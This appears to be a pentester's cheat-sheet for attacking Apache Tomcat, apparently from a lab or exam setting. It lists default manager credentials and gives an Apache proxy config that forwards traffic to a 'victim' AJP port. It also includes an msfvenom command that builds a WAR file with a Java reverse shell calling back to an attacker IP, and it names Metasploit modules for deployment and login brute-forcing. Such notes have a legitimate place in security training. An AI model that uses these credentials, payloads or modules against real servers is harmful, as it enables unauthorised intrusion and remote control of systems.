Overview

Tom­cat usu­al­ly lis­tens on the fol­low­ing ports:

• 8080 — HTTP
• 8005 — Port for shut­ting down the Tom­cat serv­er; not inter­est­ing here
• 8009 — Same func­tions as the HTTP port, but via the Apache JServ pro­to­col AJP. 
  • AJP is basi­cal­ly HTTP in a compressed/binary form.

Checklist

1. Check if /manager is accessible.
   • Default cre­den­tials are tom­cat / s3cret or admin / admin

AJP

To com­mu­ni­cate via the AJP port, Apache can be used to con­vert plain HTTP requests to AJP request.

1. Install an Apache2
2. Install liba­pache2-mod-jk
3. Restart Apache2
4. Add a proxy to the victim

ProxyRequests Off
<Proxy *>
Order deny,allow
Deny from all
Allow from localhost
</Proxy>
ProxyPass / ajp://10.11.1.222:8009/
ProxyPassReverse / ajp://10.11.1.222:8009/

Request can now made via localhost.

Exploit

Upload a WAR file with reverse shell code (Source):

msfvenom -p java/shell_reverse_tcp LHOST=192.168.109.129 LPORT=4444 -f war > shell3.war

Or do it with exploit/multi/http/tomcat_mgr_deploy.

Notes

• Use scanner/http/tomcat_mgr_login to brute-force (Source)